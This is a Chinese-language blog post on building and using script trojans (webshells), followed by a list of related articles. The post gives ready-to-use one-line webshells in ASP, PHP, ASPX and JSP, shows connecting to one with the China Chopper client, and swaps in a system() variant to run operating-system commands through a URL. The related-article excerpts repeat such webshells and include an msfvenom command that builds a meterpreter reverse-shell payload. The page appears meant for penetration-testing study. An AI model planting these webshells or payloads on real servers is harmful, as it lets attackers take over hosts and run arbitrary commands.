脚本木马的制作与原理

最新推荐文章于 2024-08-13 20:47:30 发布
最新推荐文章于 2024-08-13 20:47:30 发布
阅读量4.3k 收藏 24
点赞数 3
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88090277
版权

webshell(web后门)

一、一句话木马

短小精悍,功能强大,隐蔽性好。

<%
execute request("value")
%>

说明:
使用request的话,post和get两中方式传来的数据都可以接受。

execute用来执行客户端传来的数据。

代码本身没有危害,关键在于我们传输的数据是什么。

常见写法

asp一句话木马

<%eval request("c")%>

php一句话木马

<?php @eval($_POST[‘value’]);?>

aspx一句话木马

<%@ Page Language="Jscript"%>
<%eval(Request.ltem["value"])%>

jsp一句话木马

< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

利用中国菜刀进行连接
这边我用phpstudy做演示,需要把一句话木马文件放在网站根目录。
在这里插入图片描述
一句话木马内容为

<?php @eval($_REQUEST['xx']);
?>

在这里插入图片描述
在这里插入图片描述
可以手动获取信息
在这里插入图片描述
我们把一句话木马内容改成

<?php @system($_REQUEST['xx']);
    ?>

这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前,需要重置下缓存。
在浏览器输入

http://localhost/123.php?xx=ipconfig

执行系统命令

在这里插入图片描述
图片木马的制作
在这里插入图片描述
上传到服务器后不能直接执行,得想办法改成脚本格式或者在特定环境下以脚本运行

一句话使用技巧
在这里插入图片描述

二、小马、大马

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
还有其他木马,如打包马、脱裤马等等

giunwr
关注
专栏目录
一句话木马原理与实战
V
07-30 3382
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
用python做一个木马_Python编写简易木马程序
weixin_34405261的博客
01-30 6312
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
脚本木马制作原理
tell_me_404的博客
03-02 880
一、webshell制作原理 1、webshell种类     一句话木马(使用的最多)、小、大、打包、脱裤、、、 2、一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     eg:<%execute request(“value”)%>     解释:     execute:是一个执行函数,用来执行该命令     reque...
简单木马制作
qq_66656628的博客
03-07 355
展示简单木马制作过程,对我们防范木马具有启示
aspx命令执行小
最新发布
2301_77012231的博客
08-13 180
【代码】aspx命令执行小
Python编写简易木马程序
记录,总结,成长
01-28 9289
Python编写简易木马程序 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413
木马程序的制作
热门推荐
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
怎么做一个木马
wuli1024的博客
01-27 3279
木马恶意软件,打开时似乎是用户打开的合法文件,例如打开图像或文档或播放媒体文件,但在后台,它会运行一些邪恶的进程,例如有人可能通过后门或注入一些其他有害代码。
一个简单的键盘监听木马dawenxi的制作
qq_48637067的博客
12-25 2177
事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。 我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就
shellcode基础-Linux木马构造流程
weixin_43988746的博客
12-13 978
编写Linux木马流程
删除U盘里的小黄片吧!教你如何制作U盘木马
chengman3837的博客
02-13 8461
0x00 前言 因为这篇文章的发布正好卡在春节期间,导致作者的电子元件都被推迟到二月中旬发货,所以先写本篇文章解释大致的概念和步骤,更详细的介绍在不久后我会再发布的,另外祝大家新年拿到新0day! 0x01 邪恶的U盘 U盘木马是一个很有意思且实用的东西,他就想XXOO一样,只...
简单的木马制作并且运用
m0_46317658的博客
01-13 4994
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。 实验环境:kali和windows7 在kali终端中进行: 一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h
木马制作——图片木马制作
weixin_50339082的博客
06-09 1万+
木马制作——图片木马制作 一、简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 二、制作方式 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass']); ?
脚本木马编写
arissa666的博客
10-29 220
用waf扫描,没扫描出来有风险。小过waf之后用echo $_SERVER['DOCUMENT_ROOT']获得当前运行脚本所在的文档根目录。,然后在上传大工具。
渗透测试学习 十四、 脚本木马制作原理
weixin_30469895的博客
05-10 302
大纲:webshell制作原理    webshell使用技巧    webshell“黑吃黑” webshell制作原理   webshell种类     一句话木马(使用的最多)、小、大、打包、脱裤、、、   一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     e.g:<%execute request("v...
kali木马 简易木马制作与应用
胡乱写点什么
06-24 4912
Kali——木马(一) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— 简易木马制作与应用 —— 一.流程 首先确定靶机和攻击主机可以连通 利用msfvenom创建木马程序 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=xxx.xxx.xxx.xxx(攻击主机的ip) LPORT=xxx(攻击主机的端口) -f exe >p
制作一个小木马的步骤
小虎的空间
05-15 4584
制作一个小木马的步骤2007年09月17日 星期一 11:11特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。   我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓
渗透知识-脚本木马制作原理
Jian Sun_的博客
02-08 784
一、webshell制作原理 1、webshell种类     一句话木马(使用的最多)、小、大、打包、脱裤等等 2、一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     eg:<%execute request(“value”)%>     解释:     execute:是一个执行函数,用来执行该命令     request:是接收提交方式,可接受post型、get型、cookie型的传参     value:是参数,也是我们用
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值